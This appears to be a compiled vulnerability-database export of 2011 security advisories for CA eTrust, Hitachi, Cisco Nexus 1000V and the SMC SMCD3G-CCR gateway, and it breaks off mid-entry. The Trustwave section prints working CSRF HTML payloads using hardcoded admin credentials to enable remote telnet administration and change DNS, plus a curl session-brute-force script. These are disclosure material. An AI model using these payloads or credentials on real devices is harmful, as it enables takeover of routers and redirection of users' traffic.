Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201102-0158 | CVE-2011-0758 | CA ETrust Secure Content Manager and CA Gateway Securit of eCS In the component Service operation interruption (DoS) Vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The eCS component (ECSQdmn.exe) in CA ETrust Secure Content Manager 8.0 and CA Gateway Security 8.1 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a crafted request to port 1882, involving an incorrect integer calculation and a heap-based buffer overflow. This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Computer Associates eTrust Secure Content Manager. Authentication is not required to exploit this vulnerability.The specific flaw exists in the eTrust Common Services Transport (ECSQdmn.exe) running on port 1882. When making a request to this service a user supplied DWORD value is used in a memory copy operation. Due to the lack of bounds checking an integer can be improperly calculated leading to a heap overflow. If successfully exploited this vulnerability will result in a remote system compromise with SYSTEM credentials. Failed exploit attempts will result in a denial-of-service condition. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
CA Secure Content Manager Common Services Transport Vulnerability
SECUNIA ADVISORY ID:
SA43200
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43200/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43200
RELEASE DATE:
2011-02-10
DISCUSS ADVISORY:
http://secunia.com/advisories/43200/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43200/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43200
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in CA Secure Content Manager, which
can be exploited by malicious people to compromise a vulnerable
system.
The vulnerability is caused due to missing input validation in the
eTrust Common Services Transport (ECSQdmn.exe) service when parsing
requests and can be exploited to cause a heap-based buffer overflow
via a specially crafted request sent to port 1882.
* CA Gateway Security version 8.1.
SOLUTION:
Restrict access to the affected service.
PROVIDED AND/OR DISCOVERED BY:
Sebastian Apelt via ZDI.
ORIGINAL ADVISORY:
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-059/
CA:
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={EE6F16E1-6E05-4890-A739-2B9F745C721F}
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. ZDI-11-059: CA ETrust Secure Content Manager Common Services Transport Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-11-059
February 7, 2011 - This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 180 day deadline. To view mitigations for this vulnerability please see: http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-ca
-- CVE ID:
CVE-2011-0758
-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)
-- Affected Vendors:
CA
-- Affected Products:
CA eTrust Secure Content Manager
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6184. Authentication is not required to exploit this vulnerability.
-- Disclosure Timeline:
2008-05-23 - Vulnerability reported to vendor
2011-02-07 - Public release of advisory
-- Credit:
This vulnerability was discovered by:
* Sebastian Apelt (sebastian.apelt@siberas.de)
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0385 | No CVE | Hitachi Tuning Manager Unknown Cross-Site Scripting Vulnerability |
CVSS V2: - CVSS V3: - Severity: LOW |
Hitachi Tuning Manager is an automated, intelligent and path-aware storage resource management software that monitors, analyzes and audits the performance of storage network resources from applications to storage devices. Hitachi Tuning Manager has multiple input validation issues, and remote attackers can exploit vulnerabilities for cross-site scripting attacks to obtain sensitive information or hijack target user sessions.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Hitachi Tuning Manager versions 6.0.0 through 6.4.0-01 and 7.0.0 are vulnerable. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Hitachi Tuning Manager Cross-Site Scripting Vulnerability
SECUNIA ADVISORY ID:
SA43209
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43209/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43209
RELEASE DATE:
2011-02-08
DISCUSS ADVISORY:
http://secunia.com/advisories/43209/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43209/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43209
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Hitachi Tuning Manager, which
can be exploited by malicious people to conduct cross-site scripting
attacks.
Certain unspecified input is not properly sanitised before being
returned to the user.
The vulnerability is reported in versions 6.0.0 through 6.4.0-01 and
7.0.0 running on Windows and Solaris.
SOLUTION:
Update to version 6.4.0-02 or 7.0.0-01.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
HS11-002:
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS11-002/index.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201102-0213 | CVE-2011-0355 | Cisco Nexus 1000V Virtual Ethernet Module Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco Nexus 1000V Virtual Ethernet Module (VEM) 4.0(4) SV1(1) through SV1(3b), as used in VMware ESX 4.0 and 4.1 and ESXi 4.0 and 4.1, does not properly handle dropped packets, which allows guest OS users to cause a denial of service (ESX or ESXi host OS crash) by sending an 802.1Q tagged packet over an access vEthernet port, aka Cisco Bug ID CSCtj17451. The Cisco Nexus 1000V VEM is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause the affected application to crash, resulting in a denial-of-service condition.
The following Cisco products are vulnerable:
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3b)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3a)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(2)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(1)
The following VMware products are vulnerable:
ESXi 4.1
ESXi 4.0
ESX 4.1
ESX 4.0. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
VMware Security Advisory
Advisory ID: VMSA-2011-0002
Synopsis: Cisco Nexus 1000V VEM updates address denial of
service in VMware ESX/ESXi
Issue date: 2011-02-07
Updated on: 2011-02-07 (initial release of advisory)
CVE numbers: CVE-2011-0355
- ------------------------------------------------------------------------
1. Summary
Updated versions of the Cisco Nexus 1000V virtual switch address a
denial
of service in VMware ESX/ESXi.
2. Problem Description
a. This switch can be added to ESX and ESXi
where it replaces the VMware virtual switch and runs as part of the
ESX and ESXi kernel.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2011-0355 to the issue.
VMware customers are only affected by this vulnerability if they
have chosen to deploy the Cisco Nexus 1000V virtual switch as a
replacement for the VMware vNetwork Standard Switch or the VMware
vNetwork Distributed Switch.
VMware has confirmed that the VMware vNetwork Standard Switch and
the VMware vNetwork Distributed Switch are not affected by the
vulnerability.
The issue is documented by Cisco in Cisco bug ID CSCtj17451 (see
section 5 for a link).
4. References
CVE numbers
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0355
Cisco bug ID CSCtj17451 (registered Cisco customers only)
http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fe
tchBugDetails&bugId=CSCtj17451
- ------------------------------------------------------------------------
6.
- -----------------------------------------------------------------------
7. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
* security-announce at lists.vmware.com
* bugtraq at securityfocus.com
* full-disclosure at lists.grok.org.uk
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories
http://www.vmware.com/security/advisories
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html
Copyright 2011 VMware Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.8.3 (Build 4028)
Charset: utf-8
wj8DBQFNUNTIS2KysvBH1xkRAk1hAJ9iH1j58lM5KrwVaRYccSN3rWaw/wCePyLP
FHYGA7W1DEcKcOFWj7GkuHE=
=srWD
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Cisco Nexus 1000V Virtual Switch 802.1Q Tagged Packet Denial of
Service
SECUNIA ADVISORY ID:
SA43084
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43084/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43084
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43084/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43084/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43084
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Cisco Nexus 1000V, which can be
exploited by malicious people to cause a DoS (Denial of Service).
The vulnerability is caused due to an error when processing 802.1Q
tagged packets. This can be exploited to cause a crash when a virtual
machine sends a packet on a vEthernet port.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
Cisco (CSCtj17451):
http://www.cisco.com/en/US/docs/switches/datacenter/nexus1000/sw/4_0_4_s_v_1_3_c/release/notes/n1000v_rn.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201102-0084 | CVE-2011-0886 | SMC SMCD3G-CCR of Web Cross-site request forgery vulnerability in the interface |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface on the SMC SMCD3G-CCR (aka Comcast Business Gateway) with firmware before 1.4.0.49.2 allow remote attackers to (1) hijack the intranet connectivity of arbitrary users for requests that perform a login via goform/login, or hijack the authentication of administrators for requests that (2) enable external logins via an mso_remote_enable action to goform/RemoteRange or (3) change DNS settings via a manual_dns_enable action to goform/Basic. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible.
Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
SMC SMCD3G-CCR Two Vulnerabilities
SECUNIA ADVISORY ID:
SA43199
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43199/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
RELEASE DATE:
2011-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/43199/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43199/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can
be exploited by malicious people to conduct brute force and
cross-site request forgery attacks.
1) The web management application generates session identifiers
incrementally, which can be exploited to brute force a valid session
identifier via the "userid" cookie.
2) The web management application allows users to perform certain
actions via HTTP requests without making proper validity checks to
verify the requests. This can be exploited to e.g. enable management
via Telnet by tricking an administrator into visiting a malicious web
site while being logged-in to the application.
SOLUTION:
Reportedly fixed in firmware version 1.4.0.49.2.
PROVIDED AND/OR DISCOVERED BY:
Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs.
ORIGINAL ADVISORY:
Trustwave's SpiderLabs (TWSL2011-002):
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Trustwave's SpiderLabs Security Advisory TWSL2011-001:
Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways
(SMCD3G-CCR)
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
Published: 2011-02-04
Version: 1.0
Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com)
Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR
Version affected: Versions prior to 1.4.0.49.2
Product description:
The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of
cable internet services for Comcast Business Class customers with enhanced
services including Network Address Translation (NAT), firewalling, and
Virtual Private Network (VPN) termination.
Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs
Finding 1: Static Credentials
CVE: CVE-2011-0885
All SMCD3G-CCR gateways provided by Comcast have an administrative
login of "mso" with the password of "D0nt4g3tme". These passwords
are not provided as a part of the installation of the device and are
not recommended to be changed, thus the majority of users are unaware
of the default configuration.
With these default credentials, internal attackers can modify device
configurations to leverage more significant attacks, including redirection
of DNS requests, creation of a remote VPN termination point, and
modification of NAT entries. These credentials provide access to the web
interface for management, as well as a telnet interface that provides shell
access to the device. The mso login provides shell as UID 0 (root).
Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886
SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against
numerous management pages allowing an attacker to embed in a webpage a
malicious request against the gateway's management interface. Through
this, an attacker can modify device configuration and enable remote
administration via a telnet shell and http.
The following Proof of Concept (PoC) connects to the gateway, logs in,
modifies the remote administration to allow any user to connect externally,
and modifies the DNS information.
## smcd3g-csrf-poc.htm
<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1">
</iframe> </body> </html>
## smcd3g-csrf-poc-1.htm
<html>
<body>
<form action="http://10.1.10.1/goform/login" method="post"
name="tF">
<input type="hidden" name="user" value="mso" />
<input type="hidden" name="pws" value="D0nt4g3tme" />
</form> <script> document.tF.submit(); </script> </body>
</html>
## smcd3g-csrf-poc-2.htm
<html>
<body>
<form action="http://10.1.10.1/goform/RemoteRange"
name="RMangement" method="post"> <input type="hidden"
value="feat-admin-remote" name="file"> <input type="hidden"
value="admin/" name="dir"> <input type="hidden"
name="RemoteRange" value="0" /> <input type="hidden"
name="rm_access" value="on" /> <input type="hidden"
name="Remote0" value="0.0.0.0,0.0.0.0,1" /> <input
type="hidden" name="http_port" value="8080" /> <input
type="hidden" name="http_enable" value="on" /> <input
type="hidden" name="http_flag" value="1" /> <input
type="hidden" name="msoremote_enableCheck" value="on" />
<input type="hidden" name="mso_remote_enable" value="1" />
<input type="hidden" name="remote_enable" value="0" />
<input type="hidden" name="https_enable" value="on" />
<input type="hidden" name="https_port" value="8181" />
<input type="hidden" name="https_flag" value="1" /> <input
type="hidden" name="telnet_enable" value="on" /> <input
type="hidden" name="telnet_port" value="2323" /> <input
type="hidden" name="telnet_flag" value="1" /> <input
type="hidden" name="Remote1=" value="" /> </form> </body>
</html> <script>
setTimeout("document.RMangement.submit()",4000);
</script>
</body>
</html>
## smcd3g-csrf-poc-3.htm
<html>
<body>
<form name="WanIPform"
action="http://10.1.10.1/goform/Basic" method="post"> <input
type="hidden" value="feat-wan-ip" name="file"> <input
type="hidden" value="admin/" name="dir"> <input
type="hidden" value="Fixed" name="DNSAssign"> <input
type="hidden" value="0" name="dhcpc_release"> <input
type="hidden" value="0" name="dhcpc_renew"> <input
type="hidden" value="" name="domain_name"> <input
type="hidden" value="" name="WDn"> <input type="hidden"
name="SysName" value="" /> <input type="hidden"
name="manual_dns_enable" value="on" /> <input type="hidden"
name="DAddr" value="4.2.2.1" /> <input type="hidden"
name="DAddr0" value="4" /> <input type="hidden"
name="DAddr1" value="2" /> <input type="hidden"
name="DAddr2" value="2" /> <input type="hidden"
name="DAddr3" value="1" /> <input type="hidden"
name="PDAddr" value="4.2.2.2" /> <input type="hidden"
name="PDAddr0" value="4" /> <input type="hidden"
name="PDAddr1" value="2" /> <input type="hidden"
name="PDAddr2" value="2" /> <input type="hidden"
name="PDAddr3" value="2" /> </form> <script>
setTimeout("document.WanIPform.submit()",5000);
</script>
</body>
</html>
If the PoC was embedded in any web page the targeted user visited while
logged into the device, the attacker would be provided remote
administration in to the gateway device include a telnet shell. This would
allow the attacker to redirect traffic to a malicious end-point.
Finding 3: Weak Session Management
CVE: CVE-2011-0887
SMCD3G-CCR gateways provided by Comcast utilize a predictable value to
validate the active web management portal session. The epoch time of
beginning of the session is stored as a cookie labeled "userid". This
provides a predictable range of session IDs that can be brute-forced.
The following PoC attempts to brute force the session IDs by requesting the
admin page with an incrementing cookie and determining whether it wants to
redirect to login.asp.
## smcd3g-session-poc.sh
#!/bin/bash
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
"1" ] then echo "Session ID Found: $i"
fi
if [ $(($i % 100)) -eq "0" ]
then echo "Currently at $i"
fi
done
Through this, an attacker can brute-force the possible valid session IDs.
Sessions do by default expire within 10 minutes, thus the attack window is
limited but can be leveraged with other attack methods.
Vendor Response:
These issues have been addressed as of version 1.4.0.49.2
Remediation Steps:
In order to determine if the correct version is installed, users should
view the "About" link in the management interface. Versions 1.4.0.49.2 and
above have been corrected.
Vendor Communication Timeline:
08/30/10 - Vulnerability disclosed
01/21/11 - Patch Released
02/04/11 - Advisory Published
Revision History:
1.0 Initial publication
References
1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0085 | CVE-2011-0887 | SMC SMCD3G-CCR of Web Management portal Vulnerable to session hijacking |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The web management portal on the SMC SMCD3G-CCR (aka Comcast Business Gateway) with firmware before 1.4.0.49.2 uses predictable session IDs based on time values, which makes it easier for remote attackers to hijack sessions via a brute-force attack on the userid cookie. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible.
Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
SMC SMCD3G-CCR Two Vulnerabilities
SECUNIA ADVISORY ID:
SA43199
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43199/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
RELEASE DATE:
2011-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/43199/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43199/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can
be exploited by malicious people to conduct brute force and
cross-site request forgery attacks.
2) The web management application allows users to perform certain
actions via HTTP requests without making proper validity checks to
verify the requests. This can be exploited to e.g. enable management
via Telnet by tricking an administrator into visiting a malicious web
site while being logged-in to the application.
SOLUTION:
Reportedly fixed in firmware version 1.4.0.49.2.
PROVIDED AND/OR DISCOVERED BY:
Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs.
ORIGINAL ADVISORY:
Trustwave's SpiderLabs (TWSL2011-002):
